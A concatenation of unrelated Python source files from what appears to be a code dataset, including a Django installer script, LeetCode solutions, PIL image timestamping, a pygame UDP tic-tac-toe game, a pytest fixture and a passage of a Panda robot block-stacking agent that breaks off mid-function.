os.chmod(runserverpath, 0755)
def install(templatedir=DEFAULT_TEMPLATE_DIR, mediadir=DEFAULT_MEDIA_DIR,
staticdir=DEFAULT_STATIC_DIR, runserverpath=DEFAULT_RUNSERVER_PATH,
envdir=DEFAULT_ENV_DIR, django='1.3'):
"""
Install the runserver.py script
"""
install_virtualenv(envdir)
install_django(envdir, django)
install_runserver(envdir, runserverpath, templatedir, mediadir, staticdir)
def main():
import argparse
def directory(s):
path = os.path.abspath(s)
if os.path.exists(path):
return path
raise argparse.ArgumentTypeError('directory %r does not exist' % path)
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--django', dest='django', default='1.3',
help='Django version to use.')
parser.add_argument('-t', '--templatedir', help='Folder with your templates.',
default=DEFAULT_TEMPLATE_DIR)
parser.add_argument('-m', '--mediadir', help='Folder with your media files (css/js).',
default=DEFAULT_MEDIA_DIR)
parser.add_argument('-s', '--staticdir', help='Folder with your static files (css/js).',
default=DEFAULT_STATIC_DIR)
parser.add_argument('-r', '--runserverpath', help='Location for your runserver.py executable.',
default=DEFAULT_RUNSERVER_PATH)
args = parser.parse_args()
install(django=args.django, templatedir=args.templatedir,
mediadir=args.mediadir, staticdir=args.staticdir,
runserverpath=args.runserverpath)
print 'done'
if __name__ == '__main__':
main() |
5,144 | b4e2897e20448d543c93402174db7da4066a8510 | class Solution(object):
def isIsomorphic(self, s, t):
"""
:type s: str
:type t: str
:rtype: bool
"""
exist = set()
s_to_t = {}
if len(s) != len(t):
return False
for i, v in enumerate(s):
if v not in s_to_t:
if t[i] in exist:
return False
s_to_t[v] = t[i]
else:
if s_to_t[v] != t[i]:
return False
exist.add(t[i])
return True
class Solution_ref(object):
def isIsomorphic(self, s, t):
return [s.find(i) for i in s] == [t.find(j) for j in t]
if __name__ == '__main__':
pass |
5,145 | e6ab18d87ace00436a480f4f01da224eead84fc0 | from PIL import Image, ImageDraw, ImageFont
from PIL.ExifTags import TAGS
from datetime import datetime
#Extracts the timestamp from the filename and inserts it into the image
def insert_timestamp_from_filename_into_image(path_to_image:str,
ignorable_string:str,
output_filename:str = "",
distance_to_border:int = 5,
color_of_timestamp:tuple = (0,0,0),
size_of_timestamp:int = 20):
image = Image.open(path_to_image)
#Place the timestamp in the bottom left hand corner with a certain distance to the border
pos_of_timestamp = (distance_to_border, image.height-size_of_timestamp-distance_to_border);
#Only get the filename with its extension of the filepath
filename_with_extension = path_to_image.split("/")[-1]
filename = filename_with_extension
#Filter out the file ending (.png, .jpeg ...)
for i in range(len(filename)-1, 0, -1):
if(filename[i]=="."):
filename = filename[:i]
#Filter out the ignorable part of the string to only get the timestamp
timestamp = filename.replace(ignorable_string, "")
#Get an object back that allows for drawing on an image
drawable_image = ImageDraw.Draw(image)
#Load the font file from the local directory and print the text on to the image
font = ImageFont.truetype('arial.ttf',size_of_timestamp)
drawable_image.text(pos_of_timestamp, timestamp, color_of_timestamp, font=font)
#Either overwrite the image or save it as a new image
if(output_filename==""):
image.save(filename_with_extension)
else:
image.save(output_filename)
#Gets the current timestamp and inserts it into the image
def insert_timestamp_into_image(path_to_image:str,
output_filename:str = "",
distance_to_border:int = 5,
color_of_timestamp:tuple = (0,0,0),
size_of_timestamp:int = 20):
image = Image.open(path_to_image)
#Place the timestamp in the bottom left hand corner with a certain distance to the border
pos_of_timestamp = (distance_to_border, image.height-size_of_timestamp-distance_to_border);
#Only get the filename with its extension of the filepath
filename_with_extension = path_to_image.split("/")[-1]
#Get the current timestamp
timestamp = str(datetime.now());
#Get an object back that allows for drawing on an image
drawable_image = ImageDraw.Draw(image)
#Load the font file from the local directory and print the text on to the image
font = ImageFont.truetype('arial.ttf',size_of_timestamp)
drawable_image.text(pos_of_timestamp, timestamp, color_of_timestamp, font=font)
#Either overwrite the image or save it as a new image
if(output_filename==""):
image.save(filename_with_extension)
else:
image.save(output_filename)
#Reads the attribute where the original time of creation is saved and inserts it into the image
def insert_timestamp_from_imagedata_into_image(path_to_image:str,
output_filename:str = "",
distance_to_border:int = 5,
color_of_timestamp:tuple = (0,0,0),
size_of_timestamp:int = 20):
image = Image.open(path_to_image)
#Place the timestamp in the bottom left hand corner with a certain distance to the border
pos_of_timestamp = (distance_to_border, image.height-size_of_timestamp-distance_to_border);
#Only get the filename with its extension of the filepath
filename_with_extension = path_to_image.split("/")[-1]
#Figure out the tag_id of the attribute DateTime
exifdata = image.getexif();
tag_id = 0
for tag_id in exifdata:
tag = TAGS.get(tag_id, tag_id)
if(tag == "DateTime"):
break
#Read the attribute DateTime which is the date of creation
timestamp = str(exifdata.get(tag_id))
#Get an object back that allows for drawing on an image
drawable_image = ImageDraw.Draw(image)
#Load the font file from the local directory and print the text on to the image
font = ImageFont.truetype('arial.ttf',size_of_timestamp)
drawable_image.text(pos_of_timestamp, timestamp, color_of_timestamp, font=font)
#Either overwrite the image or save it as a new image
if(output_filename==""):
image.save(filename_with_extension)
else:
image.save(output_filename)
if __name__=="__main__":
#Example function calls
#insert_timestamp_from_filename_into_image("Image_2021-09-09_09-00-00.png", "Image_")
insert_timestamp_from_filename_into_image("Image_2021-09-09_09-00-00.JPG", "Image_", "NewImage.JPG", distance_to_border=5, color_of_timestamp=(255,0,0), size_of_timestamp=50)
#insert_timestamp_into_image("Image_2021-01-01_20-00-00.png")
insert_timestamp_into_image("Image_2021-09-09_09-00-00.JPG", "NewImage2.JPG", distance_to_border=5, color_of_timestamp=(255,0,0), size_of_timestamp=50)
#insert_timestamp_from_imagedata_into_image("Image_2021-09-09_09-00-00.png")
insert_timestamp_from_imagedata_into_image("Image_2021-09-09_09-00-00.JPG", "NewImage3.JPG", distance_to_border=5, color_of_timestamp=(255,0,0), size_of_timestamp=50)
|
5,146 | b6d9b6ec10271627b7177acead9a617520dec8f8 | import pygame
from pygame.locals import *
import threading
from load import *
import time
import socket as sck
import sys
port=8767
grid=[[None,None,None],[None,None,None],[None,None,None]]
XO='X'
OX='X'
winner=None
coordinate1=600
coordinate2=20
begin=0
address=('localhost',port)
class TTTError(Exception):
def __init__(self,value,mesg):
self.val=value
self.mesg=mesg
def __str__(self):
return repr(self.mesg)
class tic_tac_toe(sck.socket):
def __init__(self):#,condition):
super(tic_tac_toe,self).__init__(sck.AF_INET,sck.SOCK_DGRAM)
logging.info("\nSOCKET DATAGRAM ESTABLISHED\n")
self.bind(address)
self.settimeout(10) #setting the timeout
self.loading=start()
pygame.init()
self.send_ip=str(self.loading.players_uids.values()[0])
print ' HEY WAIT ! THE SENDING IP IS :{0}'.format(self.send_ip)
self.loading.load=pygame.display.set_mode((700,700))
pygame.display.set_caption("tic-tac")
self.board=self.init_board()
self.showboard(self.loading.load,self.board)
def init_board(self):
board=pygame.Surface((300,300))
board=board.convert()
board.fill((250,250,250))
pygame.draw.line(board,(0,0,0),(100,0),(100,300),2)
pygame.draw.line(board,(0,0,0),(200,0),(200,300),2)
pygame.draw.line(board,(0,0,0),(0,100),(300,100),2)
pygame.draw.line(board,(0,0,0),(0,200),(300,200),2)
return board
def showboard(self,tt,board):
global XO,winner,coordinate1,coordinate2,OX
if (winner is None):
message=OX +"'s turn"
else:
message=winner + " WON!"
print message
font=pygame.font.Font(None,24)
text=font.render(message,1,(0,0,250))
textpos=text.get_rect(center=(coordinate1,coordinate2))
coordinate2+=50
self.board.fill((250,250,250),(0,300,300,25))
textpos.centerx=self.board.get_rect().centerx
self.board.blit(text,textpos)
tt.blit(board,(0,0))
pygame.display.flip()
time.sleep(1)
def boardpos(self,mouseX,mouseY):
if (mouseY<100):
self.row=0
elif mouseY<200:
self.row=1
else: self.row=2
if mouseX < 100:
self.col=0
elif mouseX < 200:
self.col=1
else: self.col=2
return (self.col,self.row)
def draw_piece(self,board,row,col,piece):
centerX=(row*100)+50
centerY=(col*100)+50
if piece=='X':
pygame.draw.line(self.board,(0,0,0),(centerX-22,centerY-22),(centerX+22,centerY+22),2)
pygame.draw.line(self.board,(0,0,0),(centerX-22,centerY+22),(centerX+22,centerY-22),2)
else:
pygame.draw.circle(self.board,(0,0,0),(centerX,centerY),44,2)
grid[col][row]=piece
def clickboard(self,board):
global grid,XO,OX
d=TTTError(1,"SPACE OCCUPIED ALREADY")
(mouseX,mouseY)=pygame.mouse.get_pos()
(self.col,self.row)=self.boardpos(mouseY,mouseX)
try:
if (grid[self.row][self.col]=='X' or grid[self.row][self.col]=='O'):
raise d
except TTTError as t:
if t.val==1:
print t.mesg
self.clickboard(self.board)
self.draw_piece(self.board,self.row,self.col,XO)
if OX=='X':
OX='O'
else : OX='X'
return self.col,self.row
def gamewon(self,board):
global grid,winner
val=0
for row in range(0,3):
if((grid[row][0]==grid[row][1]==grid[row][2]) and grid[row][0] is not None):
logging.info("ROW no. {0} wins".format(row))
winner=grid[row][0]
pygame.draw.line(board,(250,0,0),(0,(row+1)*100-50),(300,(row+1)*100-50),2)
return True
for col in range(0,3):
if ((grid[0][col]==grid[1][col]==grid[2][col]) and grid[0][col] is not None):
logging.info("COL no. {0} wins".format(col))
winner=grid[0][col]
pygame.draw.line(board,(250,0,0),((col+1)*100-50,0),((col+1)*100-50,300),2)
return True
if ((grid[0][0]==grid[1][1]==grid[2][2]) and grid[0][0] is not None):
winner = grid[0][0]
pygame.draw.line (board, (250,0,0), (50, 50), (250, 250), 2)
return True
elif ((grid[0][2]==grid[1][1]==grid[2][0]) and grid[0][2] is not None):
winner = grid[0][2]
pygame.draw.line (board, (250,0,0), (250, 50), (50, 250), 2)
return True
def run(self):
global begin,XO,port,OX
XO=self.loading.players_ids[self.loading.uid]
OX=XO
running=1
eve=1
iterator=1
while running==1: #for receiving purpose
if (XO=='X' and begin!=0) or XO=='O':
try:
logging.info("waiting for response!")
data,conn=self.recvfrom(2048)
print data
logging.info("Encoded data received")
data=decoder(''.join(data.split(':')[1:]))
if data[0]==1: # 1 stands for the function drawpiece
self.draw_piece(self.board,data[1],data[2],data[3])
except sck.timeout as se:
print '{0} has won the game as oponent couldnt think of a move'.format(XO)
sys.exit()
break
elif XO=='X' and begin==0:
pass
self.showboard(self.loading.load,self.board) #showing the opponents move
#running=1
iterator=1
while eve==1:
for event in pygame.event.get():
if event.type is QUIT:
eve=0
elif event.type is MOUSEBUTTONDOWN:
col,row=self.clickboard(self.board)
data=[1,col,row,XO]
data=encoder(data)
data='1:'+data
print data
#self.loading.transfer_data('1:'+data)
self.sendto(data,(self.send_ip,port))
logging.info("Encoded Info transfered")
self.showboard(self.loading.load,self.board)
iterator=0
break
if iterator==0:
break
self.showboard(self.loading.load,self.board)
begin+=1
def __del__(self):
self.close()
logging.info("CLOSING ALL SOCKETS ! Thanks for playing")
|
5,147 | ff13ac0ee401471fe5446e8149f019d9da7f3ddf | import pytest
from feast.pyspark.launchers.gcloud import DataprocClusterLauncher
@pytest.fixture
def dataproc_launcher(pytestconfig) -> DataprocClusterLauncher:
cluster_name = pytestconfig.getoption("--dataproc-cluster-name")
region = pytestconfig.getoption("--dataproc-region")
project_id = pytestconfig.getoption("--dataproc-project")
staging_location = pytestconfig.getoption("--dataproc-staging-location")
return DataprocClusterLauncher(
cluster_name=cluster_name,
staging_location=staging_location,
region=region,
project_id=project_id,
)
|
5,148 | ef1b759872de6602646ce095823ff37f043ffd9d | class Solution(object):
def isPalindrome(self, x):
"""
:type x: int
:rtype: bool
"""
if x < 0: return False
t = []
while x != 0:
t.append(x % 10)
x /= 10
i, j = 0, len(t)-1
while i < j:
if t[i] != t[j]:
return False
i += 1
j -= 1
return True
|
5,149 | c3755ff5d4262dbf6eaf3df58a336f5e61531435 |
from itertools import cycle
STEP_VAL = 376
spinlock = []
for count in range(2018):
len(spinlock) % count |
5,150 | 5c1465bc70010ecabc156a04ec9877bbf66a229d | import sys
import time
import numpy
import pb_robot
import pyquaternion
import pybullet as p
from copy import deepcopy
from actions import PlaceAction, make_platform_world
from block_utils import get_adversarial_blocks, rotation_group, ZERO_POS, \
Quaternion, get_rotated_block, Pose, add_noise, \
Environment, Position, World
from pddlstream.utils import INF
from pybullet_utils import transformation
import tamp.primitives
from tamp.misc import setup_panda_world, get_pddl_block_lookup, \
print_planning_problem, ExecuteActions, ExecutionFailure
from tamp.pddlstream_utils import get_pddlstream_info, pddlstream_plan
class PandaAgent:
def __init__(self, blocks, noise=0.00005, block_init_xy_poses=None,
use_platform=False, use_vision=False, real=False,
use_planning_server=False, use_learning_server=False,
alternate_orientations=False):
"""
Build the Panda world in PyBullet and set up the PDDLStream solver.
The Panda world should in include the given blocks as well as a
platform which can be used in experimentation.
:param use_platform: Boolean stating whether to include the platform to
push blocks off of or not.
:param use_vision: Boolean stating whether to use vision to detect blocks.
:param use_planning_server: Boolean stating whether to use the separate
ROS planning service server.
:param use_learning_server: Boolean stating whether to host a ROS service
server to drive planning from active learning script.
:param alternate_orientations: Boolean stating whether blocks can be replaced in
their home positions at alternate orientations.
If you are using the ROS action server, you must start it in a separate terminal:
rosrun stacking_ros planning_server.py
"""
self.real = real
self.use_vision = use_vision
self.use_platform = use_platform
self.use_planning_server = use_planning_server
self.use_learning_server = use_learning_server
self.alternate_orientations = alternate_orientations
# Setup PyBullet instance to run in the background and handle planning/collision checking.
self._planning_client_id = pb_robot.utils.connect(use_gui=False)
self.plan()
pb_robot.utils.set_default_camera()
self.robot = pb_robot.panda.Panda()
self.robot.arm.hand.Open()
self.belief_blocks = blocks
self.pddl_blocks, self.platform_table, self.platform_leg, self.table, self.frame, self.wall = setup_panda_world(self.robot,
blocks,
block_init_xy_poses,
use_platform=use_platform)
self.fixed = [self.platform_table, self.platform_leg, self.table, self.frame, self.wall]
self.pddl_block_lookup = get_pddl_block_lookup(blocks, self.pddl_blocks)
self.orig_joint_angles = self.robot.arm.GetJointValues()
self.orig_block_poses = [b.get_base_link_pose() for b in self.pddl_blocks]
# Setup PyBullet instance that only visualizes plan execution. State needs to match the planning instance.
poses = [b.get_base_link_pose() for b in self.pddl_blocks]
poses = [Pose(Position(*p[0]), Quaternion(*p[1])) for p in poses]
self._execution_client_id = pb_robot.utils.connect(use_gui=True)
self.execute()
pb_robot.utils.set_default_camera()
self.execution_robot = pb_robot.panda.Panda()
self.execution_robot.arm.hand.Open()
setup_panda_world(self.execution_robot, blocks, poses, use_platform=use_platform)
# Set up ROS plumbing if using features that require it
if self.use_vision or self.use_planning_server or self.use_learning_server or real:
import rospy
try:
rospy.init_node("panda_agent")
except:
print("ROS Node already created")
# Create an arm interface
if real:
from franka_interface import ArmInterface
self.real_arm = ArmInterface()
from franka_core_msgs.msg import RobotState
state_topic = "/franka_ros_interface/custom_franka_state_controller/robot_state"
self.arm_last_error_time = time.time()
self.arm_error_check_time = 3.0
self.arm_state_subscriber = rospy.Subscriber(
state_topic, RobotState, self.robot_state_callback)
# Set initial poses of all blocks and setup vision ROS services.
if self.use_vision:
from panda_vision.srv import GetBlockPosesWorld, GetBlockPosesWrist
rospy.wait_for_service('get_block_poses_world')
rospy.wait_for_service('get_block_poses_wrist')
self._get_block_poses_world = rospy.ServiceProxy('get_block_poses_world', GetBlockPosesWorld)
self._get_block_poses_wrist = rospy.ServiceProxy('get_block_poses_wrist', GetBlockPosesWrist)
# Start ROS clients and servers as needed
self.last_obj_held = None
if self.use_planning_server:
from stacking_ros.srv import GetPlan, SetPlanningState
from tamp.ros_utils import goal_to_ros, ros_to_task_plan
print("Waiting for planning server...")
rospy.wait_for_service("get_latest_plan")
self.goal_to_ros = goal_to_ros
self.ros_to_task_plan = ros_to_task_plan
self.init_state_client = rospy.ServiceProxy(
"/reset_planning", SetPlanningState)
self.get_plan_client = rospy.ServiceProxy(
"/get_latest_plan", GetPlan)
print("Done!")
if self.use_learning_server:
from stacking_ros.srv import PlanTower
self.learning_server = rospy.Service(
"/plan_tower", PlanTower, self.learning_server_callback)
print("Learning server started!")
self.pddl_info = get_pddlstream_info(self.robot,
self.fixed,
self.pddl_blocks,
add_slanted_grasps=False,
approach_frame='global',
use_vision=self.use_vision)
self.noise = noise
self.txt_id = None
self.plan()
def _add_text(self, txt):
self.execute()
pb_robot.viz.remove_all_debug()
self.txt_id = pb_robot.viz.add_text(txt, position=(0, 0.25, 0.75), size=2)
self.plan()
def execute(self):
self.state = 'execute'
pb_robot.aabb.set_client(self._execution_client_id)
pb_robot.body.set_client(self._execution_client_id)
pb_robot.collisions.set_client(self._execution_client_id)
pb_robot.geometry.set_client(self._execution_client_id)
pb_robot.grasp.set_client(self._execution_client_id)
pb_robot.joint.set_client(self._execution_client_id)
pb_robot.link.set_client(self._execution_client_id)
pb_robot.panda.set_client(self._execution_client_id)
pb_robot.planning.set_client(self._execution_client_id)
pb_robot.utils.set_client(self._execution_client_id)
pb_robot.viz.set_client(self._execution_client_id)
def plan(self):
if self.use_planning_server:
return
self.state = 'plan'
pb_robot.aabb.set_client(self._planning_client_id)
pb_robot.body.set_client(self._planning_client_id)
pb_robot.collisions.set_client(self._planning_client_id)
pb_robot.geometry.set_client(self._planning_client_id)
pb_robot.grasp.set_client(self._planning_client_id)
pb_robot.joint.set_client(self._planning_client_id)
pb_robot.link.set_client(self._planning_client_id)
pb_robot.panda.set_client(self._planning_client_id)
pb_robot.planning.set_client(self._planning_client_id)
pb_robot.utils.set_client(self._planning_client_id)
pb_robot.viz.set_client(self._planning_client_id)
def reset_world(self):
""" Resets the planning world to its original configuration """
print("Resetting world")
if self.real:
angles = self.real_arm.convertToList(self.real_arm.joint_angles())
else:
angles = self.orig_joint_angles
self.plan()
self.robot.arm.SetJointValues(angles)
self.execute()
self.execution_robot.arm.SetJointValues(angles)
for bx, b in enumerate(self.pddl_blocks):
b.set_base_link_pose(self.orig_block_poses[bx])
print("Done")
def _get_initial_pddl_state(self):
"""
Get the PDDL representation of the world between experiments. This
method assumes that all blocks are on the table. We will always "clean
up" an experiment by moving blocks away from the platform after an
experiment.
"""
fixed = [self.table, self.platform_table, self.platform_leg, self.frame]
conf = pb_robot.vobj.BodyConf(self.robot, self.robot.arm.GetJointValues())
print('Initial configuration:', conf.configuration)
init = [('CanMove',),
('Conf', conf),
('StartConf', conf),
('AtConf', conf),
('HandEmpty',)]
self.table_pose = pb_robot.vobj.BodyPose(self.table, self.table.get_base_link_pose())
init += [('Pose', self.table, self.table_pose),
('AtPose', self.table, self.table_pose)]
for body in self.pddl_blocks:
print(type(body), body)
pose = pb_robot.vobj.BodyPose(body, body.get_base_link_pose())
init += [('Graspable', body),
('Pose', body, pose),
('AtPose', body, pose),
('Block', body),
('On', body, self.table),
('Supported', body, pose, self.table, self.table_pose)]
if not self.platform_table is None:
platform_pose = pb_robot.vobj.BodyPose(self.platform_table, self.platform_table.get_base_link_pose())
init += [('Pose', self.platform_table, platform_pose),
('AtPose', self.platform_table, platform_pose)]
init += [('Block', self.platform_table)]
init += [('Table', self.table)]
return init
def _get_observed_pose(self, pddl_block, action):
"""
This pose should be relative to the base of the platform leg to
agree with the simulation. The two block representations will have
different orientation but their positions should be the same.
"""
block_transform = pddl_block.get_base_link_transform()
platform_transform = self.platform_leg.get_base_link_transform()
platform_transform[2,3] -= self.platform_leg.get_dimensions()[2]/2.
rel_transform = numpy.linalg.inv(platform_transform)@block_transform
end_pose = pb_robot.geometry.pose_from_tform(rel_transform)
# TODO: Add noise to the observation.
end_pose = Pose(Position(*end_pose[0]), Quaternion(*end_pose[1]))
end_pose = add_noise(end_pose, self.noise*numpy.eye(3))
return end_pose
def _update_block_poses(self, find_moved=False):
""" Use the global world cameras to update the positions of the blocks """
try:
resp = self._get_block_poses_world()
named_poses = resp.poses
except:
import sys
print('Service call to get block poses failed. Exiting.')
sys.exit()
n_found = 0
for pddl_block_name, pddl_block in self.pddl_block_lookup.items():
for named_pose in named_poses:
if named_pose.block_id == pddl_block_name.split('_')[-1]:
pose = named_pose.pose.pose
# Skip changes the pose of objects in storage.
if pose.position.x < 0.05:
continue
n_found += 1
position = (pose.position.x, pose.position.y, pose.position.z)
orientation = (pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w)
self.execute()
pddl_block.set_base_link_pose((position, orientation))
if not self.use_planning_server:
self.plan()
pddl_block.set_base_link_pose((position, orientation))
if find_moved and n_found != len(self.moved_blocks):
input('Could not find all the moved blocks. Please reposition blocks outside of the camera view and hit enter to continue.')
self._update_block_poses(find_moved=True)
return
# After loading from vision, objects may be in collision. Resolve this.
for _, pddl_block in self.pddl_block_lookup.items():
if pb_robot.collisions.body_collision(pddl_block, self.table):
print('Collision with table and block:', pddl_block.readableName)
position, orientation = pddl_block.get_base_link_pose()
stable_z = pb_robot.placements.stable_z(pddl_block, self.table)
position = (position[0], position[1], stable_z)
self.execute()
pddl_block.set_base_link_pose((position, orientation))
self.plan()
pddl_block.set_base_link_pose((position, orientation))
# Resolve from low to high blocks.
current_poses = [b.get_base_link_pose() for b in self.pddl_blocks]
block_ixs = range(len(self.pddl_blocks))
block_ixs = sorted(block_ixs, key=lambda ix: current_poses[ix][0][2], reverse=False)
for ix in range(len(block_ixs)):
bottom_block = self.pddl_blocks[block_ixs[ix]]
for jx in range(ix+1, len(block_ixs)):
top_block = self.pddl_blocks[block_ixs[jx]]
dist_moved = 0
while pb_robot.collisions.body_collision(bottom_block, top_block):
print('Collision with bottom %s and top %s:' % (bottom_block.readableName, top_block.readableName))
position, orientation = top_block.get_base_link_pose()
stable_z = position[2] + 0.001
dist_moved += 0.001
if self.real and dist_moved > 0.04:
print(f"Found blocks {bottom_block} and {top_block} in collision")
input("Manually move the blocks and press Enter to continue")
self._update_block_poses(find_moved=False)
return
position = (position[0], position[1], stable_z)
self.execute()
top_block.set_base_link_pose((position, orientation))
self.plan()
top_block.set_base_link_pose((position, orientation))
def build_planning_problem(self, tower, base_xy):
""" Builds the initial conditions for planning """
# Set up the list of original poses and order of blocks in the tower
self.moved_blocks = set()
tower_pddl = [self.pddl_block_lookup[b.name] for b in tower]
tower_block_order = [self.pddl_blocks.index(b) for b in tower_pddl]
# Build the initial data structures
if self.use_planning_server:
from stacking_ros.msg import BodyInfo
from stacking_ros.srv import SetPlanningStateRequest
from tamp.ros_utils import block_init_to_ros, pose_to_ros, pose_tuple_to_ros, transform_to_ros
ros_req = SetPlanningStateRequest()
# Initial poses and robot configuration
if self.real:
ros_req.robot_config.angles = self.real_arm.convertToList(self.real_arm.joint_angles())
else:
ros_req.robot_config.angles = self.robot.arm.GetJointValues()
ros_req.init_state = block_init_to_ros(self.pddl_blocks)
else:
pddl_problems = []
# Base block goal pose
# TODO: Set base block to be rotated in its current position.
base_block = self.pddl_block_lookup[tower[0].name]
base_pos = (base_xy[0], base_xy[1], tower[0].pose.pos.z)
base_pose = (base_pos, tower[0].rotation)
base_pose = pb_robot.vobj.BodyPose(base_block, base_pose)
if self.use_planning_server:
base_block_ros = BodyInfo()
base_block_ros.name = base_block.readableName
base_block_ros.stack = True
pose_to_ros(base_pose, base_block_ros.pose)
ros_req.goal_state.append(base_block_ros)
else:
pddl_problems.append((self.table, base_block, (base_pos, tower[0].rotation)))
# Other block goal poses
for b_ix in range(1, len(tower)):
bottom_block = tower[b_ix-1]
bottom_pose = (bottom_block.pose.pos, bottom_block.rotation)
bottom_tform = pb_robot.geometry.tform_from_pose(bottom_pose)
top_block = tower[b_ix]
top_pose = (top_block.pose.pos, top_block.rotation)
top_tform = pb_robot.geometry.tform_from_pose(top_pose)
rel_tform = numpy.linalg.inv(bottom_tform)@top_tform
top_pddl = self.pddl_block_lookup[top_block.name]
bottom_pddl = self.pddl_block_lookup[bottom_block.name]
if self.use_planning_server:
block_ros = BodyInfo()
block_ros.name = top_pddl.readableName
block_ros.base_obj = bottom_pddl.readableName
transform_to_ros(rel_tform, block_ros.pose)
block_ros.is_rel_pose = True
block_ros.stack = True
ros_req.goal_state.append(block_ros)
else:
init_terms = [('RelPose', top_pddl, bottom_pddl, rel_tform)]
goal_terms = [('On', top_pddl, bottom_pddl)]
pddl_problems.append((bottom_pddl, top_pddl, rel_tform))
# Finally, tack on the tower resetting steps
for ix in reversed(tower_block_order):
blk, pose = self.pddl_blocks[ix], self.original_poses[ix]
goal_pose = pb_robot.vobj.BodyPose(blk, pose)
if self.use_planning_server:
block_ros = BodyInfo()
block_ros.name = blk.readableName
block_ros.stack = False
pose_to_ros(goal_pose, block_ros.pose)
ros_req.goal_state.append(block_ros)
else:
pddl_problems.append((self.table, blk, pose))
# Return the planning data structure
if self.use_planning_server:
return ros_req
else:
return pddl_problems
def build_reset_problem(self):
""" Builds the initial conditions for a tower reset given a set of moved blocks """
print("Resetting blocks...")
print("Moved Blocks:", self.moved_blocks)
# Define block order by sorting by height
current_poses = [b.get_base_link_pose() for b in self.pddl_blocks]
block_ixs = range(len(self.pddl_blocks))
block_ixs = sorted(block_ixs, key=lambda ix: current_poses[ix][0][2], reverse=True)
# Build the initial data structures
if self.use_planning_server:
from stacking_ros.msg import BodyInfo
from stacking_ros.srv import SetPlanningStateRequest
from tamp.ros_utils import block_init_to_ros, pose_to_ros, pose_tuple_to_ros, transform_to_ros
ros_req = SetPlanningStateRequest()
ros_req.init_state = block_init_to_ros(self.pddl_blocks)
if self.real:
ros_req.robot_config.angles = self.real_arm.convertToList(self.real_arm.joint_angles())
else:
ros_req.robot_config.angles = self.robot.arm.GetJointValues()
else:
pddl_problems = []
# Add all blocks to be moved to the data structure
for ix in block_ixs:
blk, pose = self.pddl_blocks[ix], self.original_poses[ix]
if blk in self.moved_blocks:
if self.use_planning_server:
goal_pose = pb_robot.vobj.BodyPose(blk, pose)
block_ros = BodyInfo()
block_ros.name = blk.readableName
block_ros.stack = False
pose_to_ros(goal_pose, block_ros.pose)
ros_req.goal_state.append(block_ros)
else:
pddl_problems.append((self.table, blk, pose))
# Return the planning data structure
if self.use_planning_server:
return ros_req
else:
return pddl_problems
def simulate_tower(self, tower, vis, T=2500, real=False, base_xy=(0., 0.5), ignore_resets=False):
"""
Simulates a tower stacking and unstacking by requesting plans from a separate planning server
Returns:
success : Flag indicating success of execution (True/False)
stable : Flag indicating (0 or 1)
num_stack_success : Number of blocks successfully stacked
"""
for block in tower:
print('Block:', block.name)
print('Pose:', block.pose)
print('Dims:', block.dimensions)
print('CoM:', block.com)
print('Rotations:', block.rotation)
print('-----')
if self.use_vision:
self._update_block_poses()
self.original_poses = [b.get_base_link_pose() for b in self.pddl_blocks]
planning_prob = self.build_planning_problem(tower, base_xy)
# Execute the stacking plan
success, stack_stable, reset_stable, num_success, fatal = \
self.plan_and_execute(planning_prob, real, T, stack=True, ignore_resets=ignore_resets)
print(f"Completed tower stack with success: {success}, stable: {stack_stable}")
if reset_stable:
print(f"Completed tower reset stable: {reset_stable}")
# If we have a nonfatal failure, replan from new state, removing successful goals
while (not success and not fatal):
print(f"Got recoverable failure. Replanning from step index {num_success}.")
if self.use_planning_server:
from tamp.ros_utils import block_init_to_ros
if self.real:
planning_prob.robot_config.angles = self.real_arm.convertToList(self.real_arm.joint_angles())
else:
planning_prob.robot_config.angles = self.robot.arm.GetJointValues()
planning_prob.init_state = block_init_to_ros(self.pddl_blocks)
if isinstance(self.last_obj_held, pb_robot.vobj.BodyGrasp):
planning_prob.held_block.name = self.last_obj_held.body.readableName
transform_to_ros(self.last_obj_held.grasp_objF, planning_prob.held_block.pose)
success, stack_stable, reset_stable, num_success, fatal = \
self.plan_and_execute(planning_prob, real, T, stack=True, start_idx=num_success, ignore_resets=ignore_resets)
print(f"Completed tower stack with success: {success}, stable: {stack_stable}")
if reset_stable:
print(f"Completed tower reset stable: {reset_stable}")
# Write the number of successfully stacked blocks
num_stack_success = min(len(tower), num_success)
# If the full tower did not succeed, reset the moved blocks
if not ignore_resets:
try:
if not (stack_stable and reset_stable):
if self.use_vision and not stack_stable:
self._update_block_poses(find_moved=True)
# TODO: Return arm to home position to help with vision.
planning_prob = self.build_reset_problem()
reset_fatal = False
num_reset_success = 0
while len(self.moved_blocks) > 0 and not reset_fatal:
print(f"Resetting {len(self.moved_blocks)} blocks.")
reset_success, _, reset_stable, num_reset_success, reset_fatal = \
self.plan_and_execute(planning_prob, real, T, stack=False, start_idx=num_reset_success)
except Exception as e:
print("Planning/execution failed during tower reset.")
print(e)
# Return the final planning state
return success, stack_stable, num_stack_success
def plan_and_execute(self, planning_prob, real=False, T=2500, stack=True, start_idx=0, ignore_resets=False):
"""
Requests a PDDLStream plan from a planning server and executes the resulting plan
Returns:
success : Flag for whether the plan execution succeeded
stack_stable : Flag for whether stacking a stable tower was successful
reset_stable : Flag for whether resetting a tower was successful
num_success : Progress (in number of steps) of successful tasks
fatal : Flag for whether the error was fatal (True) or recoverable (False)
start_idx : Start index of planning (for recovering from partial plans)
ignore_resets : Flag for whether to stop after resets
"""
# Initialize variables
num_success = start_idx
stack_stable = False
reset_stable = False
planning_active = True
if self.use_planning_server:
# Send a reset request to the planning server
ros_req = planning_prob
num_steps = len(ros_req.goal_state)
trimmed_ros_req = deepcopy(ros_req)
trimmed_ros_req.goal_state = trimmed_ros_req.goal_state[start_idx:]
self.init_state_client.call(trimmed_ros_req)
else:
pddl_problems = planning_prob
num_steps = len(pddl_problems)
while num_success < num_steps:
try:
# PLANNING
# If using planning server, request a plan from the server using ROS
if self.use_planning_server:
query_block = self.pddl_block_lookup[ros_req.goal_state[num_success].name]
# Wait for a valid plan
plan = []
saved_world = pb_robot.utils.WorldSaver()
while len(plan) == 0 and planning_active:
time.sleep(5)
print("Getting a plan from server...")
ros_resp = self.get_plan_client.call()
if not ros_resp.planning_active:
print("Planning failed on server side.")
# If failure happened during stacking, it is a fatal failure
if (ros_req.goal_state[num_success].stack):
print(f"Failed during stacking {query_block}")
fatal = True
# If failure happened during resetting, prompt user to manually reset blocks
else:
print(f"Failed during resetting {query_block}")
input("Manually reset the blocks and press Enter to continue")
if real:
self._update_block_poses()
fatal = False
